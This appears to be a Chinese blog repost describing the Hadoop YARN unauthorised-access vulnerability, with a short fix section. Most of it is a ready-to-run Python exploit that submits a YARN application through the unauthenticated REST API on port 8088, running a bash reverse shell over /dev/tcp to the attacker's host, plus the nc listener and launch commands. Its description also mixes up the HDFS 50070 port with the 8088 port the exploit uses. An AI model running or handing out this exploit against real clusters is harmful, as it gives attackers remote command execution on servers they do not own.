当前位置:   article > 正文

Hadoop-yarn-未授权访问漏洞_hadoop未授权访问

hadoop未授权访问

0x00 漏洞描述

Hadoop是由Apache基金会所开发的分布式系统基础架构,由于服务器直接开放了Hadoop机器HDFS的50070 web端口及部分默认服务端口,黑客可通过执行EXP,反弹shell,nc监听。

0x01 漏洞复现

1.编写exp

#!/usr/bin/env python

import requests
import sys

target = 'http://target-ip:8088/'  //target-ip替换为目标ip
lhost = 'your-ip' # put your local host ip here, and listen at port 2334

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/2334 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23

注:也可以尝试去GitHub上找其他的EXP进行复现。
2.监听端口

nc -lvvp 2334   //监听端口要与exp中一致,可以自行选择
  • 1

3.执行exp

python3 exploit.py http://target-ip:8088  //替换target-ip为具体搭建环境的ip
  • 1

4.反弹shell成功

0x02 漏洞修复

1.关闭Hadoop Web管理页面。
2.开启身份验证,防止未授权用户访问。
3.设置“安全组”访问控制策略,将Hadoop默认开放的多个端口对公网全部禁止或限制可信任的IP地址才能访问。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小桥流水78/article/detail/1005782
推荐阅读
相关标签
  

闽ICP备14008679号